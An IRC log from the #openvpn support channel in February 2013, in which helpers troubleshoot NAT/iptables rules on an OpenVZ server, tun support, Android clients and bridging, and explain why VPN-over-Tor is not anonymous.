15:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/]
15:04 < madsage> peace out and later krazee
15:04 -!- madsage [sage@2001:470:c:1292::2] has quit [Quit: BitchX: it's wax ecstatic]
15:05 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has joined #openvpn
15:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
15:26 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn
15:40 -!- brute11k [~brute11k@89.249.230.122] has quit [Quit: Leaving.]
15:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
15:49 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn
16:05 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer]
16:07 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
16:47 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
16:55 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"]
17:00 -!- zz_AsadH is now known as AsadH
17:03 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn
17:32 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has quit [Ping timeout: 245 seconds]
17:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 246 seconds]
17:48 -!- mythos [~mythos@unaffiliated/mythos] has quit [Remote host closed the connection]
17:49 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn
18:59 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has quit []
19:21 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn
19:21 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host]
19:21 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn
19:21 -!- mode/#openvpn [+o krzee] by ChanServ
19:26 -!- AsadH is now known as zz_AsadH
19:54 < julius__> any hints on getting openvpn work over tor?
19:57 < uberushaximus> are you sure you don't want to do it the other way around?
19:58 < uberushaximus> it'll be hard to sustain openvpn over tor
19:59 < julius__> sure, i want an anonymous secure connection
19:59 < julius__> to another host
19:59 < julius__> which can be used by my host as a router
20:00 < julius__> havent found much online, are there options for high latency links?
20:00 <+pekster> VPN's aren't anonymous, FYI
20:00 <+pekster> They're the exact opposite of anonymous
20:01 <+pekster> You will very "anonymously" connect to the VPN server, where you will then provide a certificate or user/pass that uniquely identifies you as the source of the connections to that server. I don't see the point.
20:03 < julius__> just want to play around with it
20:04 < julius__> youre right, this one could kill all the anonymity
20:06 <+pekster> Not "could." "Does."
20:14 < julius__> so its a certainty in your world that you cant pay for a vpn endpoint without your name?
20:16 <+pekster> You still identify yourself. However that is established at the VPN provider. Maybe it's simply "User 52567" or such. But it still is unique to your connection. Not *you* specifically, but the VPN credentials are what I refer to.
20:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 248 seconds]
20:29 < julius__> what if you pay with cash for a vps?
20:31 <+pekster> So what? You still get a certificate or user to auth with
20:35 < julius__> yes but you set your own openvpn server up
20:35 < julius__> isnt the connection secured even before the vpn is setup when the credentials are transferred?
20:38 <+pekster> Nope. X509 certs are sent in DER-encoded plaintext
20:38 < julius__> ok, didnt know that
20:39 <+pekster> Plus the provider may be legally compelled to keep logs, even if they "claim" they don't
20:39 < julius__> logs of what?
20:39 <+pekster> Your connection. See --log, --log-append, --syslog, and/or --daemon in the openvpn manpages
20:39 < julius__> the connection ip is from some tor node
20:40 <+pekster> That tie the credentials YOU used
20:40 <+pekster> Say that computer is picked up in a police raid. You have that private key that proves that connection was initiated from *that* computer. Anonymity busted.
20:40 <+pekster> Naturally, you don't have this problem using tor only, or first a VPN then tor.
20:41 <+pekster> This is pretty well-known in the tor community.
20:41 <+pekster> There's a popular set of slides that has a great way to remember this during his presentation. "Tor over VPN: OK. VPN over Tor: go to jail." Pretty straight forward, no?
20:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
20:45 < julius__> but ssh does transfer the login credential securely right?
20:56 <+pekster> Public components are always visible over the wire. Anything after a DH-handshake isn't. I'm sure wikipedia and other sites do a better job than I can at explaining TLS handshakes.
20:57 < julius__> ok
20:58 < julius__> but how is someone supposed to tie a x509 certificate back to you if the connection goes through tor?
20:59 <+pekster> Traffic analysis. Or use of any identifying details in the cert. Or compelling you to give up the hardware with your private key (or stealing it.) Probably other ways too.
21:00 < julius__> ok details in the cert would be bad
21:01 < julius__> but as far as i understand tor you cant just easily say that some connection comes from some host
21:01 <+pekster> And if you believe that providers are never served warrants that require them (legally) to tie a connection to a specific certificate/user/sourceIP, then you go on continuing to believe that.
21:02 <+pekster> I can't fix that kind of willful choice to ignore how laws & warrants work. I can explain how they technically use that info to "out" people who think a VPN can protect them when they do things that a government may consider illegal.
21:03 -!- JPeterson [~JPeterson@s213-103-211-4.cust.tele2.se] has quit [Ping timeout: 248 seconds]
21:09 < julius__> i know that they are
21:10 < julius__> hidemyassvpn did this for example, even if they did say they wouldnt. but since its a us company they are bound by law
21:10 < julius__> im more interested in how
21:11 < julius__> pekster, have to sleep now. are you on tomorrow?
21:11 < julius__> n8
21:16 -!- julius__ [~julius@141.41.92.122] has quit [Ping timeout: 256 seconds]
21:32 -!- danharibo [~dan@razor-studios.co.uk] has joined #openvpn
21:32 < danharibo> hi, anyone about?
21:33 < danharibo> I'm getting this when trying to start my VPN client https://gist.github.com/b6e025748040a97dd040
21:33 <@vpnHelper> Title: gist:b6e025748040a97dd040 (at gist.github.com)
21:33 < danharibo> any idea where to start looking?
21:33 <+pekster> Missing tun support in your kernel it would appear
21:34 < danharibo> ooh wait I think I know why it's not working
21:34 < danharibo> I should restart after -Syu'ing
21:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
21:56 -!- corretico [~luis@190.211.93.38] has joined #openvpn
22:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
22:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
23:06 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn
23:06 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has joined #openvpn
23:27 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 276 seconds]
23:28 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
--- Day changed Mon Feb 04 2013
00:02 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out]
00:04 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn
00:38 < danharibo> Is enable GatewayPorts discouraged?
00:38 < danharibo> enabling*
00:39 <@krzee> whats GatewayPorts? thats not part of openvpn that i know of...
00:39 <+pekster> openssh option
00:39 <@krzee> ahh
00:45 <+pekster> Depends on usecase danharibo. Enable it if you need it, don't if you don't. It's like asking if you should open a port in your firewall for a LAN client.
00:46 < danharibo> fair enough
00:46 * krzee doublechecks where he is
00:46 < danharibo> yeah sorry I have openssh and openvpn open sequentially
00:46 <@krzee> ;]
00:46 <@krzee> np tho, nobody else is here talking anyways
00:46 <@krzee> but if you ask about the meaning of life, only answer ill give is 42
00:47 < danharibo> heh
00:47 <+pekster> No, no, that's "Life, the Universe, and Everything."
00:47 <+pekster> Well, maybe. We never found out what the question was, exactly :P
01:00 -!- Pei [pei@2600:3c00::f03c:91ff:feae:5e2d] has joined #openvpn
01:05 < Pei> Hi, i've got an OpenVPN running on my main server, My windows client connects fine and I can browse the web, connect to irc, basically use the internet. I have copied the /etc/openvpn exactly on another server, change the remote ip address in the windows config file, and connect. The client connects to the OpenVPN server on the new server, assigns an IP address, but I can't connect anywhere
01:05 < Pei> but the server openvpn is running on. iptables -L shows no firewall rules. Server is fresh install not 2 hours old.
01:06 < Pei> using Debian 6
01:06 <@krzee> iptables -L -t nat
01:07 <@krzee> on both servers
01:07 <@krzee> oh wait, even better
01:07 <@krzee> !redirect
01:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
01:07 <@vpnHelper> http://ircpimps.org/redirect.png
01:07 <@krzee> see the flowchart =]
01:08 < Pei> MASQUERADE all -- anywhere anywhere
01:08 < Pei> ^^^^^ is missing on new server
01:08 <+pekster> iptables -L is fundamentally broken. Use 'iptables-save' to dump rules
01:08 < nutcase> Whats the easiest way to daisy chain some vpns together?
01:08 <@krzee> im not asking to see it, im pointing it out to you
01:08 <@krzee> nutcase, by understanding this page VERY VERY well
01:08 <@krzee> !route
01:08 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
01:08 * nutcase starts reading
01:09 < Pei> !nat
01:09 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto
01:09 <@krzee> you wanted
01:09 <@krzee> !linnat
01:09 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat
01:11 < nutcase> krzee have you ever tried to use openvpn on an android device?
01:11 < nutcase> !android
01:11 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the
01:11 <@vpnHelper> market
01:11 <@krzee> nutcase, yep
01:11 < nutcase> There is a better OpenVPN client
01:12 <@krzee> was that a question?
01:12 <+pekster> Crazy (verry sill and non-sensical) chaining setup: http://fpaste.org/jRhL/
01:12 < nutcase> https://play.google.com/store/apps/details?id=de.blinkt.openvpn&hl=en
01:12 <@vpnHelper> Title: OpenVPN for Android - Android Apps on Google Play (at play.google.com)
01:12 <+pekster> silly*
01:12 < nutcase> I never was able to config it to work
01:12 <@krzee> nutcase, you using ICS / JB?
01:12 < nutcase> JB
01:12 <@krzee> get a config that works in other os, like linux
01:12 <@krzee> then import it
01:13 <@krzee> it just works!
01:13 < Pei> when i do iptables -t nat -A POSTROUTING -s 10.1.10.0/24 -o venet0:0 -j MASQUERADE
01:13 < Pei> iptables: No chain/target/match by that name.
01:13 < Pei> i get that
01:13 < nutcase> lol alright I will mess with it again later
01:13 <@krzee> Pei,
01:13 <@krzee> !openvznat
01:13 <@vpnHelper> "openvznat" is (#1) a user reported success with this command: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -j SNAT --to or (#2) someone else got it working with: iptables -t nat -A POSTROUTING -s / -o eth -j SNAT --to
01:13 <@krzee> you are in a virtual machine, im guessing openvz, amiright?
01:13 < Pei> yes
01:13 <@krzee> cool, there ya go =]
01:14 < Pei> okay thanks
01:14 <@krzee> np
01:14 <@krzee> nutcase, there is also another android app, but ive never used it
01:14 <+pekster> You're missing the listed chain, target, or match support in your kernel. Possibly MASQUERADE, although in theory it could be nat support too. Probably not the chain, since nat table support implicitly includes the 3 standard chains
01:14 <@krzee> i really really like the app you linked me to
01:15 <@krzee> pekster, known openvz thing
01:15 < nutcase> yeah krzee that's the one I was talking about :)
01:15 < Pei> here goes nothin
01:15 <+pekster> krzee: Yes, I know. Some providers *also* don't include the right modules for OpenVZ containers
01:15 < nutcase> I read some guides a while ago and they suggested using that one over the actual openvpn client because this one works better
01:16 <+pekster> BSD-licensed too, that's nice
01:16 <@krzee> nutcase, this version was released by an active openvpn community developer and is open source, the other was by openvpn technologies and is not open source
01:16 < nutcase> ah
01:17 <@krzee> i have no plans on playing with the closed source version
01:17 < nutcase> https://play.google.com/store/apps/details?id=net.openvpn.openvpn
01:17 <@vpnHelper> Title: OpenVPN Connect - Android Apps on Google Play (at play.google.com)
01:17 < nutcase> That's the closed source version?
01:17 <@krzee> yes
01:18 < nutcase> Yeah that one is buggy in my experience and from what I have read of other people's experiences
01:18 <@krzee> makes sense that it could be buggier at first, it was a full re-code in a different language
01:19 <@krzee> whereas the opensource version is basically the same ol opensource code you're running on linux
01:19 < nutcase> yeah
01:19 < nutcase> Does MIUI come with openvpn already installed like CM?
01:19 <@krzee> they had to do the re-code if i understood right, to get accepted to Itunes store for IOS
01:20 <@krzee> no idea, i use CM
01:20 <@krzee> ask MIUI
01:20 < nutcase> What device?
01:20 < nutcase> there isn't a miui channel on this server lol
01:20 <+pekster> How's that non-free one work with the GPL-status of OpenVPN? Is *all* the code there really dual-licensed by "OpenVPN Technologies" from every committer?
01:20 <@krzee> *shrug*
01:20 < Pei> HAH
01:21 < Pei> thank you soooooooo much
01:21 <@krzee> pekster, full re-code
01:21 <+pekster> I mean, I don't really expect the small-ish patches I've submitted to be given special licensing status, but I've submitted 4 or 5 patches over the years that have been merged. I signed no agreement
01:21 <@krzee> oh wait
01:21 <+pekster> Ah, okay
01:21 <@krzee> you mean access-server?
01:21 <+pekster> No, the 'droid code
01:21 <@krzee> ahh ok, yes full recode
01:21 <+pekster> Weird :\
01:21 < Pei> iptables -t nat -A POSTROUTING -s 10.2.10.0/24 -j SNAT --to 198.23.248.15 <--- that one did the trick
01:22 <@krzee> not so weird
01:22 <@krzee> apple's fault
01:22 <@krzee> they had to do the re-code if i understood right, to get accepted to Itunes store for IOS
01:22 <@krzee> itunes store is incompat with gpl from my understanding
01:22 <@krzee> itunes apps aren't allowed to be opensource if i understood
01:22 < nutcase> apple sucks
01:22 <@krzee> (i may have only understood 1/2 way)
01:23 <@krzee> nutcase, my currently owned devices are here: http://forum.xda-developers.com/member.php?u=2820309
01:23 < nutcase> ah
01:23 < Pei> so, lame question but iptables absolutely terrifies me.... what's the best way to apply that rule every time the machine boots
01:24 < Pei> on debian
01:24 <@krzee> Pei, #debian
01:24 < nutcase> woah my user number on xda is low
01:24 < Pei> aww come on buds ;)'
01:24 <@krzee> if you asked about freebsd ild tell you, im not googling debian crap :-p
01:25 <+pekster> That's an OS-level knob; for all I (maybe "we") care, write your own initscript (Gentoo has a very nice init script for iptables/netfilter. AFAIK debian does not.)
01:25 <@krzee> damn 2006, nice
01:25 <+pekster> I've hooked into the pre-up feature of debian before, but I'm not sure that's the "proper" way to do it in debian. I just got annoyed when docs suggested I use ufw, so I wrote my own code on my AWS Ubuntu server
01:26 < nutcase> heh I've been around for a while :P
01:26 * pekster doesn't touch tools like ufw or shorewall
01:27 < Devastator> according to debian wiki, if-pre-up.d is the right place to put a ruleset
01:28 <+pekster> Apparently that's what I did
01:29 <+pekster> I named an 05iptables script there that does some magic and ultimately calls iptables-restore if I deem it necessary
01:29 < Devastator> yes, like "The perfect ruleset" doc says..
01:30 <+pekster> http://fpaste.org/OoRh/ if you want some ideas
01:30 <+pekster> I just cooked that up to meet my needs, so edit to taste
01:32 <@krzee> time for me to sleep(8)
01:32 <@krzee> goodnight
01:32 < Devastator> night krzee
01:38 -!- Tabrenus [~Tabrenus@213.211.132.86.static.edpnet.net] has quit [Quit: Tabrenus]
02:36 -!- mattock_afk is now known as mattock
03:04 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:15 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn
03:15 < zrzerenato> hi everyone..
03:16 < zrzerenato> im getting an error with the system clock to sync with VPN. can someone help please?
03:17 -!- brute11k [~brute11k@89.249.230.122] has joined #openvpn
03:18 < zrzerenato> i believe someone at my job restarted the system pushing the power button, and all the system time is crazy, so now i cannot connect through VPN
03:23 <+EugeneKay> man ntp
03:24 <+EugeneKay> And buy a new server, because if the BIOS battery is dead you're using antique hardware.
03:25 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has quit [Read error: Connection reset by peer]
03:25 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has joined #openvpn
03:27 -!- Porkepix [~Porkepix@157.138.188.104] has joined #openvpn
03:28 -!- zrzerenato [~zrzerenat@189-015-215-072.xd-dynamic.ctbcnetsuper.com.br] has quit [Client Quit]
03:29 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out]
03:50 -!- Porkepix [~Porkepix@157.138.188.104] has quit [Quit: Computer has gone to sleep.]
04:05 -!- zz_AsadH is now known as AsadH
04:19 -!- mode/#openvpn [-v pekster] by ChanServ
04:19 -!- mode/#openvpn [-v pekster] by ChanServ
04:20 < pekster> Laggy chanserv :\
04:34 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn
04:35 < sam1> hm, what could be the problem if openvpn pushes gateway 0.0.0.0 for destination 0.0.0.0? I'm checking the routing table on the client.. If I add the redirect-gateway directive, there will be a gateway address for destination 0.0.0.0
04:36 < sam1> I'm using openvpn with bridging
04:44 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Read error: Operation timed out]
04:51 < kisom> sam1: Are you sure openvpn is pushing it? Enable verb 7 and check everything that is being pushed
05:00 < sam1> kisom: Mon Feb 4 11:58:11 2013 us=125344 client1/remote-ip:55532 SENT CONTROL [client1]: 'PUSH_REPLY,dhcp-option DNS 10.10.66.1,dhcp-option DOMAIN DERP,route-gateway 10.10.66.7,ping 10,ping-restart 120,ifconfig 10.10.66.201 255.255.255.0' (status=1)
05:00 < sam1> kisom: seems so.
05:09 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds]
05:14 < sam1> kisom: but I don't see anything regarding the gateway on the client side. I see something that is quite weird though " Inernal IP4 Point-To-Point Address: 0.0.0.0"
05:22 -!- brute11k1 [~brute11k@89.249.231.171] has joined #openvpn
05:22 -!- brute11k [~brute11k@89.249.230.122] has quit [Read error: Operation timed out]
05:25 < sam1> Using another vpn service I see there is a " Internal Gateway: " on the client side.
05:25 < sam1> weird.
05:46 -!- ScriptFanix [~vincent@Hanaman.riquer.fr] has joined #openvpn
05:46 -!- ScriptFanix [~vincent@Hanaman.riquer.fr] has quit [Client Quit]
05:46 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn
05:47 -!- niervol [~krystian@193.106.244.150] has quit [Ping timeout: 245 seconds]
05:47 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer]
05:48 -!- niervol [~krystian@193.106.244.150] has joined #openvpn
06:04 -!- ade_b [~Ade@37.250.11.72.bredband.tre.se] has joined #openvpn
06:04 -!- ade_b [~Ade@37.250.11.72.bredband.tre.se] has quit [Changing host]
06:04 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
06:09 -!- Porkepix [~Porkepix@157.138.190.79] has joined #openvpn
06:11 < sam1> kisom: got it working.
06:11 < sam1> kisom: http://openvpn.net/index.php/open-source/faq/77-server/323-i-want-to-set-up-an-ethernet-bridge-on-the-1921681024-subnet-existing-dhcp.html I tried with that first, but still the gateway wasn't set up on the client, even though the server pushed it
06:11 <@vpnHelper> Title: I want to set up an ethernet bridge on the 192.168.1.0/24 subnet. existing DHCP. (at openvpn.net)
06:12 < sam1> kisom: then I combined it with redirect-gateway def1, since I have seen it set the gw on the client
06:12 < sam1> kisom: so now it routes all traffic from the client to the gw on the lan at the remote site,
06:14 < sam1> I'm wondering if the howto here is really correct: http://openvpn.net/index.php/open-source/documentation/miscellaneous/76-ethernet-bridging.html
06:14 <@vpnHelper> Title: Ethernet Bridging (at openvpn.net)
06:15 < sam1> if you compare it to the answered question above
06:15 -!- julius_ [~julius@141.41.92.122] has joined #openvpn
06:16 < sam1> according to the ethernet bridge guide, you are supposed to use the vpn machine as gw. but in the FAQ they describe how to use the LAN gw
06:17 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Ping timeout: 245 seconds]
06:19 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has joined #openvpn
06:26 -!- Devastator- [~devas@177.99.152.211] has joined #openvpn
06:26 -!- Devastator- [~devas@177.99.152.211] has quit [Changing host]
06:26 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn
06:27 -!- Devastator [~devas@177.99.152.211] has quit [Read error: Connection reset by peer]
06:28 -!- uberushaximus [~uberushax@shepard.sypherz.com] has quit [Ping timeout: 252 seconds]
06:28 -!- william_ [~x@lotus.redl8.com] has quit [Ping timeout: 252 seconds]
06:29 -!- william_ [~x@lotus.redl8.com] has joined #openvpn
06:29 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn
06:30 -!- Devastator- is now known as Devastator
06:45 -!- Porkepix [~Porkepix@157.138.190.79] has quit [Quit: Computer has gone to sleep.]
06:47 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn
06:56 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
06:59 -!- Porkepix [~Porkepix@157.138.189.185] has joined #openvpn
07:02 -!- master_of_master [~master_of@p57B554B3.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:04 -!- master_of_master [~master_of@p57B55202.dip.t-dialin.net] has joined #openvpn
07:49 -!- dazo_afk is now known as dazo
07:49 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 248 seconds]
07:50 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn
07:52 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer]
07:55 -!- oyunokata [~rrinehart@209.163.177.130] has joined #openvpn
07:56 <@dazo> Anyone remember if there are any issues running both a Cisco VPN and OpenVPN simultaneously? Both running as a client
07:57 < havoc> the obvious ones
07:57 < havoc> redir-gw, conflicting subnets, etc...
07:57 <@dazo> yeah, apart from that, I meant
07:57 < havoc> otherwise they coexist
07:57 <@dazo> okay good! :)
07:58 < havoc> we do it at work; ovpn & cisco
07:58 <@dazo> on Windows or *nix-ish?
07:58 < havoc> lot of the devs have several vpn clients on their machines
07:58 < havoc> windows
07:58 <@dazo> cool! That's enough confidence for me to claim it should work :)
07:59 < havoc> but it all depends on configs, of course
07:59 < havoc> but I can say, positively, that it *can* work
07:59 -!- catsup [~d@64.111.123.163] has joined #openvpn
07:59 <@dazo> yeah, that's normal ... just wanted to ensure that a support engineer requiring cisco for his work can connect to an openvpn network I control
07:59 < havoc> ah
08:00 < havoc> other potential issues are [non-]admin related, UAC, etc...
08:00 <@dazo> yupp
08:00 * dazo will soon discover how clever that support engineer really is
08:00 <@dazo> :)
08:01 < havoc> we have a mix of RRAS, OpenVPN, Cisco, CheckPoint, SonicWall clients on a lot of the devs' machines
08:02 < havoc> some don't play nice together, but that's because of the configs
08:04 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 244 seconds]
08:05 -!- b1rkh0ff [~b1rkh0ff@178.77.21.150] has quit [Ping timeout: 245 seconds]
08:06 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:11 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 240 seconds]
08:12 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:16 < sam1> um, anyone running openvpn with openvpn-auth-ldap on debian squeeze stable?
08:17 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 256 seconds]
08:18 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:19 -!- b1rkh0ff [~b1rkh0ff@178.77.13.80] has joined #openvpn
08:24 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds]
08:25 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:31 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds]
08:31 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
08:32 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:34 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
08:37 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 244 seconds]
08:38 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:39 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
08:39 -!- nickanderson_afk is now known as nickanderson
08:44 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 252 seconds]
08:44 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has joined #openvpn
08:45 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:46 < Jonathan__> !welcome
08:46 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
08:46 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
08:46 -!- bjh4 [~bjh4@12.239.198.1] has joined #openvpn
08:46 < Jonathan__> !redirect
08:46 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
08:46 <@vpnHelper> http://ircpimps.org/redirect.png
08:47 < Jonathan__> !dns
08:47 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns
08:48 -!- Jonathan__ [~Jonathan@c-24-11-161-203.hsd1.mi.comcast.net] has quit [Client Quit]
08:48 -!- Jonathan__ [~Jonathan@173.212.224.54] has joined #openvpn
08:49 < fys> there's always money in the banana stand.
08:50 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 260 seconds]
08:51 -!- catsup [~d@64.111.123.163] has joined #openvpn
08:54 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
08:54 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
09:02 -!- Porkepix [~Porkepix@157.138.189.185] has quit [Quit: Computer has gone to sleep.]
09:04 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn
09:05 < Eagleman> I am trying to set up a scope so i will be able to access my tcp network ( also OpenVPN ) on 10.8.1.0. However i am unable to ping 10.8.1.2 but i am able to ping 10.8.1.1. I am sure that the client on 10.8.1.2 is connected: http://pastebin.com/E21Y5VxG
09:06 < Eagleman> 10.8.0.0 is my UDP network
09:16 -!- danharibo [~dan@razor-studios.co.uk] has left #openvpn ["WeeChat 0.3.4"]
09:16 < Eagleman> log: http://pastebin.com/YwMGwZDs
09:16 < Eagleman> Someone here?
09:21 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving]
09:33 <@ecrist> !configs
09:33 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
09:34 <@ecrist> and that log pastebin is horseshit
09:34 <@ecrist> do a better copy/paste
09:35 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn
09:37 < Eagleman7> client: http://pastebin.com/GTz6qwPS serverlog: http://pastebin.com/0QXT5QKJ clientlog: http://pastebin.com/LzQiK3V1
09:38 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 248 seconds]
09:42 < Eagleman7> This should do it all in one and comments removed: http://pastebin.com/wFSQf1H3
09:44 < Eagleman7> !log
09:44 <@vpnHelper> Error: You don't have the owner capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified.
09:46 <@ecrist> what are you trying to do?
09:46 <@ecrist> !gload
09:46 <@ecrist> !goal
09:46 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
